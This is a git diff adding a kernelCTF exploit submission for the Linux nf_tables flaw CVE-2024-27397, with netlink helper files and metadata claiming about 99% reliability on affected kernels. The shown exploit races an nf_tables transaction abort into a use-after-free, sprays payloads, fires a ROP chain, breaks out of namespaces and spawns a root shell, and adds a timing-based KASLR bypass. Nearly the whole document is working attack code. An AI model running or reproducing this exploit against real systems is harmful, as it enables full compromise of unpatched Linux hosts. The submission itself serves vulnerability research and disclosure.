netlink_nest_end(nlh, list); + + end_batch_chunk(batch, nlh); + } + + { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + end_batch_chunk(batch, nlh); + } + + if (send_check(nfd, batch) != 0) { + perror("netlink_send()"); + return -1; + } + + // 2) make the element expire during a transaction abort + + bzero(buf, BUF_SIZE); + + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + batch->nlmsg_flags = NLM_F_REQUEST ; + batch->nlmsg_seq = 0; + batch->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_NFTABLES); + + { + // Delete the victim set. This will decrease reference counters for all elements + + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_NAME, MY_SET); + + end_batch_chunk(batch, nlh); + } + + for (u16 i = 0; i < MAX_NUM_JUNK_OPS; i++) { + { + // Delete one of our junk sets. The sole purpose is to delay the transaction + const u16 set_name = generate_set_name(i); + + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_NAME, &set_name, sizeof(set_name)); + + end_batch_chunk(batch, nlh); + } + } + + { + // Do an invalid operation, this triggers the abort path which undos + // everything we did before. + + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + end_batch_chunk(batch, nlh); + } + + { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + end_batch_chunk(batch, nlh); + } + + if (send_check(nfd, batch) == 0) { + printf("unexpected success when triggering operation abort!\n"); + return -1; + } + + // wait for RCU + sleep(1); + + // we can now free our chain with the additional reference dropped.. + + bzero(buf, BUF_SIZE); + + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + batch->nlmsg_flags = NLM_F_REQUEST ; + batch->nlmsg_seq = 0; + batch->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_NFTABLES); + + { + // Delete chain B. Now that we have dropped an additional reference, we can + // delete the chain while keeping the JUMP in chain A + + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELCHAIN; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_CHAIN_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_CHAIN_NAME, CHAIN_B); + + end_batch_chunk(batch, nlh); + } + + { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + end_batch_chunk(batch, nlh); + } + + if (send_check(nfd, batch) != 0) { + printf("attempt failed! retry ..\n"); + continue; + } + + success = 1; + break; + } + + if (!success) { + printf("races failed too many times\n"); + return -1; + } + + + // Success, the chain will eventually be freed + // Wait for RCU + printf("waiting for free ..\n"); + sleep(1); + + // Now we reclaim the freed rule blobs + // + // Note that we DO NOT reclaim the freed chain object + // We rely on the pointers not being erased during the object destruction. + // Additionally, the random kmalloc caches reduce noise, so nothing really + // to worry about here. + + printf("spraying payloads ..\n"); + if (spray_payload(spray_fd) < 0) { + exit(1); + } + + setup_cpu_entry_area(); + // wait for it to complete + sleep(1); + + // Trigger the payload .. + + sendto(s, rop_chain_rsi, sizeof(rop_chain_rsi), 0, (struct sockaddr*)&dst, sizeof(dst)); + + // if we made it this far, we hopefully succeeded: + setns(open("/proc/1/ns/mnt", O_RDONLY), 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + char* shell[] = { + "/bin/sh", + "-c", + "/bin/cat /flag && /bin/sh", + NULL, + }; + execve(shell[0], shell, NULL); + exit(1); +} + +// KASLR bypass +// +// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h +// +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile ("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile( + "xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + + +void prefetch(void* p) +{ + asm volatile ( + "prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : : "r" (p)); +} + +size_t flushandreload(void* addr) // row miss +{ + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +int bypass_kaslr(u64 base) { + if (!base) { + #ifdef KASLR_BYPASS_INTEL + #define OFFSET 0 + #define START (0xffffffff81000000ull + OFFSET) + #define END (0xffffffffD0000000ull + OFFSET) + #define STEP 0x0000000001000000ull + while (1) { + u64 bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + bases[vote] = addrs[mini]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + base -= OFFSET; + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } + #else + #define START (0xffffffff81000000ull) + #define END (0xffffffffc0000000ull) + #define STEP 0x0000000000200000ull + #define NUM_TRIALS 7 + // largest contiguous mapped area at the beginning of _stext + #define WINDOW_SIZE 11 + + while (1) { + u64 bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) { + sum += times[ti + i]; + } + if (sum > max) { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } + #endif + } + +got_base: + printf("using kernel base %llx\n", base); + + i64 diff = 0xffffffff81000000 - base; + printf("diff: %lld\n", diff); + + #define x(name) { name -= diff; printf("corrected %s to %llx\n", #name, name); } + FOR_ALL_OFFSETS(x); + #undef x + + return 0; +} diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/netlink.c b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/netlink.c new file mode 100644 index 00000000..a02652c8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/netlink.c @@ -0,0 +1,153 @@ +#include "netlink.h" + +#include +#include +#include +#include +#include +#include + + +u16 netlink_attr_put(struct nlmsghdr* nlh, u16 nla_type, const void* data, u16 data_len) { + nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len); + struct nlattr* attr = (void*)(nlh) + nlh->nlmsg_len; + + attr->nla_type = nla_type; + attr->nla_len = NLA_HDRLEN + data_len; + memcpy((char*)attr + NLA_HDRLEN, data, data_len); + + nlh->nlmsg_len += attr->nla_len; + return attr->nla_len; +} + +u16 netlink_attr_append(struct nlattr* attr, u16 nla_type, const void* data, u16 data_len) { + attr->nla_len = NLMSG_ALIGN(attr->nla_len); + struct nlattr* a = (void*)(attr) + attr->nla_len; + + a->nla_type = nla_type; + a->nla_len = NLA_HDRLEN + data_len; + memcpy((char*)a + NLA_HDRLEN, data, data_len); + + attr->nla_len += a->nla_len; + return a->nla_len; +} + +struct nlattr* netlink_nest_begin(struct nlmsghdr* nlh, u16 nla_type) { + nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len); + struct nlattr* attr = (void*)(nlh) + nlh->nlmsg_len; + + attr->nla_type = nla_type; + attr->nla_len = NLA_HDRLEN; + + return attr; +} +u16 netlink_nest_end(struct nlmsghdr* nlh, struct nlattr* attr) { + nlh->nlmsg_len += attr->nla_len; + return attr->nla_len; +} + +struct nlattr* netlink_attr_nest_begin(struct nlattr* attr, u16 nla_type) { + attr->nla_len = NLMSG_ALIGN(attr->nla_len); + struct nlattr* child = (void*)attr + attr->nla_len; + + child->nla_type = nla_type; + child->nla_len = NLA_HDRLEN; + + return child; +} +u16 netlink_attr_nest_end(struct nlattr* parent, struct nlattr* inner) { + parent->nla_len += inner->nla_len; + return inner->nla_len; +} + + +int __netlink_send(int fd, const void* nlh, size_t size) { + struct iovec iov = { + .iov_base = (void*)nlh, + .iov_len = size, + }; + struct msghdr msg = { + .msg_name = NULL, + .msg_namelen = 0, + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = NULL, + .msg_controllen = 0, + .msg_flags = 0, + }; + + if (sendmsg(fd, &msg, 0) < 0) { + perror("sendmsg()"); + return -1; + } + + return 0; +} + +int netlink_recv(int fd, void* nlh, size_t size) { + struct iovec iov = { + .iov_base = (void*)nlh, + .iov_len = 0, + }; + struct msghdr msg = { + .msg_name = NULL, + .msg_namelen = 0, + .msg_iov = NULL, + .msg_iovlen = 0, + .msg_control = NULL, + .msg_controllen = 0, + .msg_flags = MSG_TRUNC, + }; + + memset(nlh, 0, size); + iov.iov_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC | MSG_DONTWAIT); + if ((ssize_t)iov.iov_len < 0) { + if (errno == EAGAIN) { + return 0; + } + + perror("recvmsg()"); + return -1; + } + if (iov.iov_len > size) { + fprintf(stderr, "message too large: %zu > %zu\n", iov.iov_len, size); + return -1; + } + + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + return recvmsg(fd, &msg, 0); +} + +int netlink_errno(const struct nlmsghdr* nlh) { + if (nlh->nlmsg_len == 0) { + return 0; + } + if (nlh->nlmsg_type != NLMSG_ERROR) { + fprintf(stderr, "warning: not a netlink error message: %hu\n", nlh->nlmsg_type); + return 0; + } + struct nlmsgerr* e = NLMSG_DATA(nlh); + if (e->error != 0) { + errno = -e->error; + } + + return e->error; +} + +int netlink_open(int proto) { + struct sockaddr_nl addr = {0}; + addr.nl_family = AF_NETLINK; + + int s = socket(AF_NETLINK, SOCK_RAW, proto); + if (s < 0) { + perror("socket()"); + return s; + } + if (bind(s, (struct sockaddr*)&addr, sizeof(addr)) == -1) { + perror("bind()"); + return -1; + } + + return s; +} diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/netlink.h b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/netlink.h new file mode 100644 index 00000000..f88e8f58 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/netlink.h @@ -0,0 +1,41 @@ +#ifndef __H_NETLINK +#define __H_NETLINK + +#include +#include + +#include + +typedef uint16_t u16; + +static inline void* nlmsg_end(struct nlmsghdr* nlh) { + return (char*)(nlh) + NLMSG_ALIGN(nlh->nlmsg_len); +} + +static inline void* nlattr_end(struct nlattr* attr) { + return (char*)(attr) + NLMSG_ALIGN(attr->nla_len); +} + +int netlink_open(int proto); + +int netlink_recv(int fd, void* nlh, size_t size); + +int __netlink_send(int fd, const void* nlh, size_t size); +static inline int netlink_send(int fd, const struct nlmsghdr* nlh) { + return __netlink_send(fd, nlh, nlh->nlmsg_len); +} + +int netlink_errno(const struct nlmsghdr* nlh); + +u16 netlink_attr_put(struct nlmsghdr* nlh, u16 nla_type, const void* data, u16 data_len); + +struct nlattr* netlink_nest_begin(struct nlmsghdr* nlh, u16 nla_type); +u16 netlink_nest_end(struct nlmsghdr* nlh, struct nlattr* attr); + +struct nlattr* netlink_attr_nest_begin(struct nlattr* attr, u16 nla_type); +u16 netlink_attr_nest_end(struct nlattr* parent, struct nlattr* inner); + +u16 netlink_attr_append(struct nlattr* attr, u16 nla_type, const void* data, u16 data_len); + + +#endif /* __H_NETLINK */ diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/metadata.json new file mode 100644 index 00000000..a336c0f5 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/metadata.json @@ -0,0 +1,22 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v2.json", + "submission_ids": ["exp164"], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7395dfacfff65e9938ac0889dafa1ab01e987d15", + "cve": "CVE-2024-27397", + "affected_versions": ["4.1-rc1 - 6.8-rc4"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": ["CONFIG_NF_TABLES"] + } + }, + "exploits": [ + { + "environment": "mitigation-6.1.55", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "~99%" + } + ] +} diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/original.tar.gz new file mode 100644 index 00000000..f88e7d0d Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/original.tar.gz differ